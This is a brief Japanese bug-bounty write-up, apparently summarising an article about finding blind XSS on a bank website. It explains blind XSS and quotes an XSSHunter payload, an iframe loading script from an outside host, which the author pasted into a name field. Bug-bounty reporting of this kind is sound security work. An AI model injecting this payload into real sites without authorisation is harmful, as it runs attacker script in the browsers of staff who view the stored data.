Hello there, ('ω')ノ
5 分以内にブラインド XSS を取得を。
脆弱性:
ブラインド XSS
記事:
https://infosecwriteups.com/get-blind-xss-within-5-minutes-100-9718bd056570
今回は、銀行サイトで Blind XSS を見つけた方法について。
バグ報奨金プログラムを探していたときに redacted.com を見つけ。
有効な提出があった場合、redacted.com は CVSS に従って報奨金を授与し。
だから、それを試してみることに。
ブラインド XSS とは、クロスサイト スクリプティング (XSS) の一種であり。
攻撃者が Web ページに一連の悪意のあるペイロードを「盲目的に」展開し。
それらを永続的な状態 (データベースやログ ファイルなど) に。
保存する可能性があり。
XSSHunter ペイロード
<iframe/srcdoc=”<script/src=//narayananm.xss.ht></script>”>
をすばやくコピーし、名前フィールドに貼り付け。
数分後、以下のメールが届いて。
ペイロードが実行されて。
ヒント:
常にすべての入力フィールドを確認して。
Best regards, (^^ゞ